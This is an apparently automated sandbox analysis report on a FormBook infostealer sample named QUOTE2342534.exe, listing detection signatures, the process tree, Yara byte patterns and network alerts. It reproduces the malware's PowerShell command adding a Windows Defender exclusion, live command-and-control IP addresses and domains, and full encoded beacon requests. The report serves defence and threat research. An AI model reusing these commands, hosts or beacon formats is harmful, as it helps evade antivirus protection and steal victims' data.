Windows Analysis Report
QUOTE2342534.exe

Overview

General Information

Sample name: QUOTE2342534.exe
Analysis ID: 1541203
MD5: c19949939d08baee86643132d7ce7542
SHA1: 5c8f131cb332bb49c68ab04cc2350c224d4d4d5b
SHA256: a99f8a264c968ef7d4815a0bf6d53854d7c26da69adba84750c48c58bfea7384
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • QUOTE2342534.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C19949939D08BAEE86643132D7CE7542)
    • powershell.exe (PID: 5396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5908 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • QUOTE2342534.exe (PID: 2704 cmdline: "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C19949939D08BAEE86643132D7CE7542)
      • qnPyaKsYTE.exe (PID: 1308 cmdline: "C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 5652 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • qnPyaKsYTE.exe (PID: 2296 cmdline: "C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.QUOTE2342534.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.QUOTE2342534.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e413:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.QUOTE2342534.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.QUOTE2342534.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTE2342534.exe", ParentImage: C:\Users\user\Desktop\QUOTE2342534.exe, ParentProcessId: 1992, ParentProcessName: QUOTE2342534.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", ProcessId: 5396, ProcessName: powershell.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTE2342534.exe", ParentImage: C:\Users\user\Desktop\QUOTE2342534.exe, ParentProcessId: 1992, ParentProcessName: QUOTE2342534.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", ProcessId: 5396, ProcessName: powershell.exe

            AV Detection

            Source: QUOTE2342534.exe, ReversingLabs: Detection: 28%
            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: QUOTE2342534.exe, Joe Sandbox ML: detected
            Source: QUOTE2342534.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: QUOTE2342534.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshta.pdbGCTL source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnPyaKsYTE.exe, 00000007.00000000.2154339993.000000000012E000.00000002.00000001.01000000.0000000C.sdmp, qnPyaKsYTE.exe, 0000000A.00000000.2297414318.000000000012E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdbSHA256 source: QUOTE2342534.exe
            Source: Binary string: wntdll.pdb source: QUOTE2342534.exe, QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdb source: QUOTE2342534.exe
            Source: Binary string: mshta.pdb source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F3C390 FindFirstFileW,FindNextFileW,FindClose, 8_2_02F3C390
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then xor eax, eax, 8_2_02F29B10
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then pop edi, 8_2_02F2E030
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then mov ebx, 00000004h, 8_2_03B604DF

            Networking

            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49787 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49787 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49866 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49877 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49893 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49908 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49908 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49940 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49956 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50030 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50037 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50035 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50034 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50039 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50039 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50034 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50036 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50018 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50038 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50038 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50022 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 84.32.84.32:80
            Source: DNS query: www.xueerr.xyz
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
            Source: Joe Sandbox ViewASN Name: METAREGISTRARNL METAREGISTRARNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dxfwrc2h.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /4bpc/?7Bohe=W6c12MBAM7+Q3p2I42CNcaaX4meOt2NlPYb0dUqqy/7eqOW0wKa7H8cBCmolVGR7OaXpdOvS7kWyFQKJ7xuZambhzJ6Jbz/iDls78L0zlt4s48FcRMJ2uoIWwWqypjO6Yg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nieuws-july202491.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /oacu/?vD=h0e85v&7Bohe=QyeFQ+FiMQKSKdq/BKxG+5Ov1bwmlN3FnlPZyKM2ZYbXsZFvV/O3NTv6ZfeubWU6jSKaxDXQpId5DKUlUVN54eSFHJCOrp//l7em+zpeeu1iGig/Io/KcJQlUpo44DFlsQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.putizhong.homesConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /o55g/?7Bohe=SntAYgquUuF8cmTqKgeHt96czNjKbI7walrzfjn5MBbpbz0DMUAQT5TGmaCmCOcjM4ET7TOvVUXTFF/O6lHSx5C+s9iWJ/mgfg63citE2SV2GP/8IEdknZeeY7ynAeJL4g==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.coba168.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kb53/?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.everyone.golfConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /elh0/?7Bohe=pzF/mZhnV0GSmLX+GycMwU6WT06CzqVGvQudBfY4Dqjs/3KtcpfJYGVadgWONk/4osLjzgZwgHUQ0ZwKAvTdTnbY8Qd/xTrHuaQfE1OzRfvOWlfeun0LuB51rXnhStJusg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.royapop.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
